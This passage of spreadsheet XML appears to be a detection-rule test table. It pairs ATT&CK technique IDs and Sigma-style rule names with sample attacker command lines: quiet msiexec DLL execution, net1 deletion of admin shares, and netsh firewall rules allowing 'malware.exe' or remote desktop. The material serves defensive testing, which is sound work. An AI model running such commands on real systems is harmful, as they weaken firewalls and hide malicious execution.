      <c r="I2897" s="43" t="inlineStr">
        <is>
          <t>Msiexec Quiet Installation (79a87aa6-e4bd-42fc-a5bb-5e6fbdcd62f5)</t>
        </is>
      </c>
      <c r="J2897" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2897" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2898" ht="15.75" customHeight="1" s="42">
      <c r="A2898" s="43" t="inlineStr">
        <is>
          <t>t1218.007</t>
        </is>
      </c>
      <c r="B2898" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_msiexec_execute_dll</t>
        </is>
      </c>
      <c r="C2898" s="43" t="inlineStr">
        <is>
          <t>Suspicious Msiexec Execute Arbitrary DLL</t>
        </is>
      </c>
      <c r="D2898" s="43" t="inlineStr">
        <is>
          <t>6f4191bb-912b-48a8-9ce7-682769541e6d</t>
        </is>
      </c>
      <c r="E2898" s="43" t="inlineStr">
        <is>
          <t>c:\windows\system32\msiexec.exe/y "C:\AtomicRedTeam\atomics\T1218.007\bin\MSIRunner.dll"</t>
        </is>
      </c>
      <c r="F2898" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2898" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2898" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2898" s="43" t="inlineStr">
        <is>
          <t>Msiexec Quiet Installation (79a87aa6-e4bd-42fc-a5bb-5e6fbdcd62f5)</t>
        </is>
      </c>
      <c r="J2898" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2898" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2899" ht="15.75" customHeight="1" s="42">
      <c r="A2899" s="43" t="inlineStr">
        <is>
          <t>t1218.007</t>
        </is>
      </c>
      <c r="B2899" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_msiexec_execute_dll</t>
        </is>
      </c>
      <c r="C2899" s="43" t="inlineStr">
        <is>
          <t>Suspicious Msiexec Execute Arbitrary DLL</t>
        </is>
      </c>
      <c r="D2899" s="43" t="inlineStr">
        <is>
          <t>6f4191bb-912b-48a8-9ce7-682769541e6d</t>
        </is>
      </c>
      <c r="E2899" s="43" t="inlineStr">
        <is>
          <t>c:\windows\system32\msiexec.exe /y "C:\AtomicRedTeam\atomics\T1218.007\bin\MSIRunner.dll" ""</t>
        </is>
      </c>
      <c r="F2899" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2899" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2899" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2899" s="43" t="inlineStr">
        <is>
          <t>Msiexec Quiet Installation (79a87aa6-e4bd-42fc-a5bb-5e6fbdcd62f5)</t>
        </is>
      </c>
      <c r="J2899" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2899" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2900" ht="15.75" customHeight="1" s="42">
      <c r="A2900" s="43" t="inlineStr">
        <is>
          <t>t1218.007</t>
        </is>
      </c>
      <c r="B2900" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_msiexec_execute_dll</t>
        </is>
      </c>
      <c r="C2900" s="43" t="inlineStr">
        <is>
          <t>Suspicious Msiexec Execute Arbitrary DLL</t>
        </is>
      </c>
      <c r="D2900" s="43" t="inlineStr">
        <is>
          <t>6f4191bb-912b-48a8-9ce7-682769541e6d</t>
        </is>
      </c>
      <c r="E2900" s="43" t="inlineStr">
        <is>
          <t>c:\windows\system32\msiexec.exe /y C:\AtomicRedTeam\atomics\T1218.007\bin\MSIRunner.dll</t>
        </is>
      </c>
      <c r="F2900" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2900" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2900" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2900" s="43" t="inlineStr">
        <is>
          <t>Msiexec Quiet Installation (79a87aa6-e4bd-42fc-a5bb-5e6fbdcd62f5)</t>
        </is>
      </c>
      <c r="J2900" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2900" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2901" ht="15.75" customHeight="1" s="42">
      <c r="A2901" s="43" t="inlineStr">
        <is>
          <t>t1218.007</t>
        </is>
      </c>
      <c r="B2901" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_msiexec_install_quiet</t>
        </is>
      </c>
      <c r="C2901" s="43" t="inlineStr">
        <is>
          <t>Msiexec Quiet Installation</t>
        </is>
      </c>
      <c r="D2901" s="43" t="inlineStr">
        <is>
          <t>79a87aa6-e4bd-42fc-a5bb-5e6fbdcd62f5</t>
        </is>
      </c>
      <c r="E2901" s="43" t="inlineStr">
        <is>
          <t>c:\windows\system32\msiexec.exe /q /i "C:\AtomicRedTeam\atomics\T1218.007\bin\T1218.007_DLL.msi"</t>
        </is>
      </c>
      <c r="F2901" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2901" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2901" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2901" s="43" t="inlineStr">
        <is>
          <t>Msiexec Quiet Installation (79a87aa6-e4bd-42fc-a5bb-5e6fbdcd62f5); Suspicious Msiexec Quiet Install From Remote Location (8150732a-0c9d-4a99-82b9-9efb9b90c40c)</t>
        </is>
      </c>
      <c r="J2901" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2901" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2902" ht="15.75" customHeight="1" s="42">
      <c r="A2902" s="43" t="inlineStr">
        <is>
          <t>t1218.007</t>
        </is>
      </c>
      <c r="B2902" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_msiexec_install_quiet</t>
        </is>
      </c>
      <c r="C2902" s="43" t="inlineStr">
        <is>
          <t>Msiexec Quiet Installation</t>
        </is>
      </c>
      <c r="D2902" s="43" t="inlineStr">
        <is>
          <t>79a87aa6-e4bd-42fc-a5bb-5e6fbdcd62f5</t>
        </is>
      </c>
      <c r="E2902" s="43" t="inlineStr">
        <is>
          <t>c:\windows\system32\msiexec.exe /quiet /i "C:\AtomicRedTeam\atomics\T1218.007\bin\T1218.007_DLL.msi"</t>
        </is>
      </c>
      <c r="F2902" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2902" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2902" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2902" s="43" t="inlineStr">
        <is>
          <t>Msiexec Quiet Installation (79a87aa6-e4bd-42fc-a5bb-5e6fbdcd62f5); Suspicious Msiexec Quiet Install From Remote Location (8150732a-0c9d-4a99-82b9-9efb9b90c40c)</t>
        </is>
      </c>
      <c r="J2902" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2902" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2903" ht="15.75" customHeight="1" s="42">
      <c r="A2903" s="43" t="inlineStr">
        <is>
          <t>t1218.007</t>
        </is>
      </c>
      <c r="B2903" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_msiexec_install_quiet</t>
        </is>
      </c>
      <c r="C2903" s="43" t="inlineStr">
        <is>
          <t>Msiexec Quiet Installation</t>
        </is>
      </c>
      <c r="D2903" s="43" t="inlineStr">
        <is>
          <t>79a87aa6-e4bd-42fc-a5bb-5e6fbdcd62f5</t>
        </is>
      </c>
      <c r="E2903" s="43" t="inlineStr">
        <is>
          <t>c:\windows\system32\msiexec.exe /i "C:\AtomicRedTeam\atomics\T1218.007\bin\T1218.007_DLL.msi" /q</t>
        </is>
      </c>
      <c r="F2903" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2903" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2903" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2903" s="43" t="inlineStr">
        <is>
          <t>Msiexec Quiet Installation (79a87aa6-e4bd-42fc-a5bb-5e6fbdcd62f5); Suspicious Msiexec Quiet Install From Remote Location (8150732a-0c9d-4a99-82b9-9efb9b90c40c)</t>
        </is>
      </c>
      <c r="J2903" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2903" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2904" ht="15.75" customHeight="1" s="42">
      <c r="A2904" s="43" t="inlineStr">
        <is>
          <t>t1218.007</t>
        </is>
      </c>
      <c r="B2904" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_msiexec_install_quiet</t>
        </is>
      </c>
      <c r="C2904" s="43" t="inlineStr">
        <is>
          <t>Msiexec Quiet Installation</t>
        </is>
      </c>
      <c r="D2904" s="43" t="inlineStr">
        <is>
          <t>79a87aa6-e4bd-42fc-a5bb-5e6fbdcd62f5</t>
        </is>
      </c>
      <c r="E2904" s="43" t="inlineStr">
        <is>
          <t>"c:\windows\system32\msiexec.exe" /q /i "C:\AtomicRedTeam\atomics\T1218.007\bin\T1218.007_DLL.msi"</t>
        </is>
      </c>
      <c r="F2904" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2904" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2904" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2904" s="43" t="inlineStr">
        <is>
          <t>Msiexec Quiet Installation (79a87aa6-e4bd-42fc-a5bb-5e6fbdcd62f5); Suspicious Msiexec Quiet Install From Remote Location (8150732a-0c9d-4a99-82b9-9efb9b90c40c)</t>
        </is>
      </c>
      <c r="J2904" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2904" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2905" ht="15.75" customHeight="1" s="42">
      <c r="A2905" s="43" t="inlineStr">
        <is>
          <t>t1218.007</t>
        </is>
      </c>
      <c r="B2905" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_msiexec_install_quiet</t>
        </is>
      </c>
      <c r="C2905" s="43" t="inlineStr">
        <is>
          <t>Msiexec Quiet Installation</t>
        </is>
      </c>
      <c r="D2905" s="43" t="inlineStr">
        <is>
          <t>79a87aa6-e4bd-42fc-a5bb-5e6fbdcd62f5</t>
        </is>
      </c>
      <c r="E2905" s="43" t="inlineStr">
        <is>
          <t>c:\windows\system32\msiexec.exe /q /i C:\AtomicRedTeam\atomics\T1218.007\bin\T1218.007_DLL.msi</t>
        </is>
      </c>
      <c r="F2905" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2905" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2905" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2905" s="43" t="inlineStr">
        <is>
          <t>Msiexec Quiet Installation (79a87aa6-e4bd-42fc-a5bb-5e6fbdcd62f5); Suspicious Msiexec Quiet Install From Remote Location (8150732a-0c9d-4a99-82b9-9efb9b90c40c)</t>
        </is>
      </c>
      <c r="J2905" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2905" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2906" ht="15.75" customHeight="1" s="42">
      <c r="A2906" s="43" t="inlineStr">
        <is>
          <t>t1070.005</t>
        </is>
      </c>
      <c r="B2906" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_net_share_unmount</t>
        </is>
      </c>
      <c r="C2906" s="43" t="inlineStr">
        <is>
          <t>Unmount Share Via Net.EXE</t>
        </is>
      </c>
      <c r="D2906" s="43" t="inlineStr">
        <is>
          <t>cb7c4a03-2871-43c0-9bbb-18bbdb079896</t>
        </is>
      </c>
      <c r="E2906" s="43" t="inlineStr">
        <is>
          <t>C:\\WINDOWS\system32\net1  share \\test\\share /D</t>
        </is>
      </c>
      <c r="F2906" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2906" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2906" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2906" s="43" t="inlineStr">
        <is>
          <t>Unmount Share Via Net.EXE (cb7c4a03-2871-43c0-9bbb-18bbdb079896); Unmount Share Via Net.EXE (cb7c4a03-2871-43c0-9bbb-18bbdb079896)</t>
        </is>
      </c>
      <c r="J2906" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2906" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2907" ht="15.75" customHeight="1" s="42">
      <c r="A2907" s="43" t="inlineStr">
        <is>
          <t>t1070.005</t>
        </is>
      </c>
      <c r="B2907" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_net_share_unmount</t>
        </is>
      </c>
      <c r="C2907" s="43" t="inlineStr">
        <is>
          <t>Unmount Share Via Net.EXE</t>
        </is>
      </c>
      <c r="D2907" s="43" t="inlineStr">
        <is>
          <t>cb7c4a03-2871-43c0-9bbb-18bbdb079896</t>
        </is>
      </c>
      <c r="E2907" s="43" t="inlineStr">
        <is>
          <t>C:\\WINDOWS\system32\net1  share C$ /delete</t>
        </is>
      </c>
      <c r="F2907" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2907" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2907" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2907" s="43" t="inlineStr">
        <is>
          <t>Unmount Share Via Net.EXE (cb7c4a03-2871-43c0-9bbb-18bbdb079896); Unmount Share Via Net.EXE (cb7c4a03-2871-43c0-9bbb-18bbdb079896)</t>
        </is>
      </c>
      <c r="J2907" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2907" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2908" ht="15.75" customHeight="1" s="42">
      <c r="A2908" s="43" t="inlineStr">
        <is>
          <t>t1070.005</t>
        </is>
      </c>
      <c r="B2908" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_net_share_unmount</t>
        </is>
      </c>
      <c r="C2908" s="43" t="inlineStr">
        <is>
          <t>Unmount Share Via Net.EXE</t>
        </is>
      </c>
      <c r="D2908" s="43" t="inlineStr">
        <is>
          <t>cb7c4a03-2871-43c0-9bbb-18bbdb079896</t>
        </is>
      </c>
      <c r="E2908" s="43" t="inlineStr">
        <is>
          <t>C:\\WINDOWS\system32\net1  share IPC$ /delete</t>
        </is>
      </c>
      <c r="F2908" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2908" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2908" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2908" s="43" t="inlineStr">
        <is>
          <t>Unmount Share Via Net.EXE (cb7c4a03-2871-43c0-9bbb-18bbdb079896); Unmount Share Via Net.EXE (cb7c4a03-2871-43c0-9bbb-18bbdb079896)</t>
        </is>
      </c>
      <c r="J2908" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2908" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2909" ht="15.75" customHeight="1" s="42">
      <c r="A2909" s="43" t="inlineStr">
        <is>
          <t>t1562.004</t>
        </is>
      </c>
      <c r="B2909" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_fw_add_rule</t>
        </is>
      </c>
      <c r="C2909" s="43" t="inlineStr">
        <is>
          <t>New Firewall Rule Added Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D2909" s="43" t="inlineStr">
        <is>
          <t>cd5cfd80-aa5f-44c0-9c20-108c4ae12e3c</t>
        </is>
      </c>
      <c r="E2909" s="43" t="inlineStr">
        <is>
          <t>netsh advfirewall firewall add rule name="RDPPORTLatest-TCP-In" dir=in action=allow protocol=TCP localport=4489</t>
        </is>
      </c>
      <c r="F2909" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2909" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2909" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2909" s="43" t="inlineStr">
        <is>
          <t>New Firewall Rule Added Via Netsh.EXE (cd5cfd80-aa5f-44c0-9c20-108c4ae12e3c)</t>
        </is>
      </c>
      <c r="J2909" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2909" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2910" ht="15.75" customHeight="1" s="42">
      <c r="A2910" s="43" t="inlineStr">
        <is>
          <t>t1562.004</t>
        </is>
      </c>
      <c r="B2910" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_fw_add_rule</t>
        </is>
      </c>
      <c r="C2910" s="43" t="inlineStr">
        <is>
          <t>New Firewall Rule Added Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D2910" s="43" t="inlineStr">
        <is>
          <t>cd5cfd80-aa5f-44c0-9c20-108c4ae12e3c</t>
        </is>
      </c>
      <c r="E2910" s="43" t="inlineStr">
        <is>
          <t>netsh advfirewall firewall add rule name=Dropbox dir=in action=allow "program=malware.exe" enable=yes profile=Any</t>
        </is>
      </c>
      <c r="F2910" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2910" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2910" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2910" s="43" t="inlineStr">
        <is>
          <t>New Firewall Rule Added Via Netsh.EXE (cd5cfd80-aa5f-44c0-9c20-108c4ae12e3c)</t>
        </is>
      </c>
      <c r="J2910" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2910" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2911" ht="15.75" customHeight="1" s="42">
      <c r="A2911" s="43" t="inlineStr">
        <is>
          <t>t1562.004</t>
        </is>
      </c>
      <c r="B2911" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_fw_add_rule</t>
        </is>
      </c>
      <c r="C2911" s="43" t="inlineStr">
        <is>
          <t>New Firewall Rule Added Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D2911" s="43" t="inlineStr">
        <is>
          <t>cd5cfd80-aa5f-44c0-9c20-108c4ae12e3c</t>
        </is>
      </c>
      <c r="E2911" s="43" t="inlineStr">
        <is>
          <t>netsh.exe advfirewall firewall set rule group='remote desktop' new enable=Yes</t>
        </is>
      </c>
      <c r="F2911" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2911" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2911" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2911" s="43" t="inlineStr">
        <is>
          <t>Netsh Allow Group Policy on Microsoft Defender Firewall (347906f3-e207-4d18-ae5b-a9403d6bcdef); Firewall Rule Update Via Netsh.EXE (a70dcb37-3bee-453a-99df-d0c683151be6)</t>
        </is>
      </c>
      <c r="J2911" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2911" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2912" ht="15.75" customHeight="1" s="42">
      <c r="A2912" s="43" t="inlineStr">
        <is>
          <t>t1562.004</t>
        </is>
      </c>
      <c r="B2912" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_fw_allow_program_in_susp_location</t>
        </is>
      </c>
      <c r="C2912" s="43" t="inlineStr">
        <is>
          <t>Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D2912" s="43" t="inlineStr">
        <is>
          <t>a35f5a72-f347-4e36-8895-9869b0d5fc6d</t>
        </is>
      </c>
      <c r="E2912" s="43" t="inlineStr">
        <is>
          <t>netsh advfirewall firewall add rule name="Bypass" dir=in action=allow program="evil.exe"</t>
        </is>
      </c>
      <c r="F2912" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2912" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2912" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2912" s="43" t="inlineStr">
        <is>
          <t>New Firewall Rule Added Via Netsh.EXE (cd5cfd80-aa5f-44c0-9c20-108c4ae12e3c)</t>
        </is>
      </c>
      <c r="J2912" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2912" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2913" ht="15.75" customHeight="1" s="42">
      <c r="A2913" s="43" t="inlineStr">
        <is>
          <t>t1562.004</t>
        </is>
      </c>
      <c r="B2913" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_fw_allow_program_in_susp_location</t>
        </is>
      </c>
      <c r="C2913" s="43" t="inlineStr">
        <is>
          <t>Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D2913" s="43" t="inlineStr">
        <is>
          <t>a35f5a72-f347-4e36-8895-9869b0d5fc6d</t>
        </is>
      </c>
      <c r="E2913" s="43" t="inlineStr">
        <is>
          <t>netsh advfirewall firewall add rule name="Hidden" dir=in action=allow program="agent.exe"</t>
        </is>
      </c>
      <c r="F2913" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2913" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2913" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2913" s="43" t="inlineStr">
        <is>
          <t>New Firewall Rule Added Via Netsh.EXE (cd5cfd80-aa5f-44c0-9c20-108c4ae12e3c)</t>
        </is>
      </c>
      <c r="J2913" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2913" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2914" ht="15.75" customHeight="1" s="42">
      <c r="A2914" s="43" t="inlineStr">
        <is>
          <t>t1562.004</t>
        </is>
      </c>
      <c r="B2914" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_fw_allow_program_in_susp_location</t>
        </is>
      </c>
      <c r="C2914" s="43" t="inlineStr">
        <is>
          <t>Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D2914" s="43" t="inlineStr">
        <is>
          <t>a35f5a72-f347-4e36-8895-9869b0d5fc6d</t>
        </is>
      </c>
      <c r="E2914" s="43" t="inlineStr">
        <is>
          <t>netsh advfirewall firewall add rule name="MaliciousRule" dir=in action=allow program="malware.exe"</t>
        </is>
      </c>
      <c r="F2914" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2914" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2914" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2914" s="43" t="inlineStr">
        <is>
          <t>New Firewall Rule Added Via Netsh.EXE (cd5cfd80-aa5f-44c0-9c20-108c4ae12e3c)</t>
        </is>
      </c>
      <c r="J2914" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2914" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2915" ht="15.75" customHeight="1" s="42">
      <c r="A2915" s="43" t="inlineStr">
        <is>
          <t>t1562.004</t>
        </is>
      </c>
      <c r="B2915" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_fw_allow_program_in_susp_location</t>
        </is>
      </c>
      <c r="C2915" s="43" t="inlineStr">
        <is>
          <t>Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D2915" s="43" t="inlineStr">
        <is>
          <t>a35f5a72-f347-4e36-8895-9869b0d5fc6d</t>
        </is>
      </c>
      <c r="E2915" s="43" t="inlineStr">
        <is>
          <t>netsh advfirewall firewall add rule name="Bypass" dir=in action=allow program="C:\Temp\evil.exe"</t>
        </is>
      </c>
      <c r="F2915" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2915" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2915" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2915" s="43" t="inlineStr">
        <is>
          <t>Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE (a35f5a72-f347-4e36-8895-9869b0d5fc6d); New Firewall Rule Added Via Netsh.EXE (cd5cfd80-aa5f-44c0-9c20-108c4ae12e3c)</t>
        </is>
      </c>
      <c r="J2915" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2915" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2916" ht="15.75" customHeight="1" s="42">
      <c r="A2916" s="43" t="inlineStr">
        <is>
          <t>t1562.004</t>
        </is>
      </c>
      <c r="B2916" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_fw_allow_program_in_susp_location</t>
        </is>
      </c>
      <c r="C2916" s="43" t="inlineStr">
        <is>
          <t>Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D2916" s="43" t="inlineStr">
        <is>
          <t>a35f5a72-f347-4e36-8895-9869b0d5fc6d</t>
        </is>
      </c>
      <c r="E2916" s="43" t="inlineStr">
        <is>
          <t>netsh advfirewall firewall add rule name="Hidden" dir=in action=allow program="C:\Users\Public\agent.exe"</t>
        </is>
      </c>
      <c r="F2916" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2916" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2916" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2916" s="43" t="inlineStr">
        <is>
          <t>Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE (a35f5a72-f347-4e36-8895-9869b0d5fc6d); New Firewall Rule Added Via Netsh.EXE (cd5cfd80-aa5f-44c0-9c20-108c4ae12e3c)</t>
        </is>
      </c>
      <c r="J2916" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2916" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2917" ht="15.75" customHeight="1" s="42">
      <c r="A2917" s="43" t="inlineStr">
        <is>
          <t>t1562.004</t>
        </is>
      </c>
      <c r="B2917" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_fw_allow_program_in_susp_location</t>
        </is>
      </c>
      <c r="C2917" s="43" t="inlineStr">
        <is>
          <t>Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D2917" s="43" t="inlineStr">
        <is>
          <t>a35f5a72-f347-4e36-8895-9869b0d5fc6d</t>
        </is>
      </c>
      <c r="E2917" s="43" t="inlineStr">
        <is>
          <t>netsh advfirewall firewall add rule name="MaliciousRule" dir=in action=allow program="C:\Windows\Temp\malware.exe"</t>
        </is>
      </c>
      <c r="F2917" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2917" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2917" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2917" s="43" t="inlineStr">
        <is>
          <t>Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE (a35f5a72-f347-4e36-8895-9869b0d5fc6d); New Firewall Rule Added Via Netsh.EXE (cd5cfd80-aa5f-44c0-9c20-108c4ae12e3c)</t>
        </is>
      </c>
      <c r="J2917" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2917" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2918" ht="15.75" customHeight="1" s="42">
      <c r="A2918" s="43" t="inlineStr">
        <is>
          <t>t1562.004</t>
        </is>
      </c>
      <c r="B2918" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_fw_allow_program_in_susp_location</t>
        </is>
      </c>
      <c r="C2918" s="43" t="inlineStr">
        <is>
          <t>Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D2918" s="43" t="inlineStr">
        <is>
          <t>a35f5a72-f347-4e36-8895-9869b0d5fc6d</t>
        </is>
      </c>
      <c r="E2918" s="43" t="inlineStr">
        <is>
          <t>netsh advfirewall firewall add rule name="Bypass" dir=in action=allow program="C:\$Recycle.Bin\evil.exe"</t>
        </is>
      </c>
      <c r="F2918" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2918" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2918" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2918" s="43" t="inlineStr">
        <is>
          <t>Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE (a35f5a72-f347-4e36-8895-9869b0d5fc6d); New Firewall Rule Added Via Netsh.EXE (cd5cfd80-aa5f-44c0-9c20-108c4ae12e3c)</t>
        </is>
      </c>
      <c r="J2918" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2918" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2919" ht="15.75" customHeight="1" s="42">
      <c r="A2919" s="43" t="inlineStr">
        <is>
          <t>t1562.004</t>
        </is>
      </c>
      <c r="B2919" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_fw_allow_program_in_susp_location</t>
        </is>
      </c>
      <c r="C2919" s="43" t="inlineStr">
        <is>
          <t>Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D2919" s="43" t="inlineStr">
        <is>
          <t>a35f5a72-f347-4e36-8895-9869b0d5fc6d</t>
        </is>
      </c>
      <c r="E2919" s="43" t="inlineStr">
        <is>
          <t>netsh advfirewall firewall add rule name="Hidden" dir=in action=allow program="C:\Users\Default\agent.exe"</t>
        </is>
      </c>
      <c r="F2919" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2919" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2919" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2919" s="43" t="inlineStr">
        <is>
          <t>Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE (a35f5a72-f347-4e36-8895-9869b0d5fc6d); New Firewall Rule Added Via Netsh.EXE (cd5cfd80-aa5f-44c0-9c20-108c4ae12e3c)</t>
        </is>
      </c>
      <c r="J2919" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2919" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2920" ht="15.75" customHeight="1" s="42">
      <c r="A2920" s="43" t="inlineStr">
        <is>
          <t>t1562.004</t>
        </is>
      </c>
      <c r="B2920" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_fw_allow_program_in_susp_location</t>
        </is>
      </c>
      <c r="C2920" s="43" t="inlineStr">
        <is>
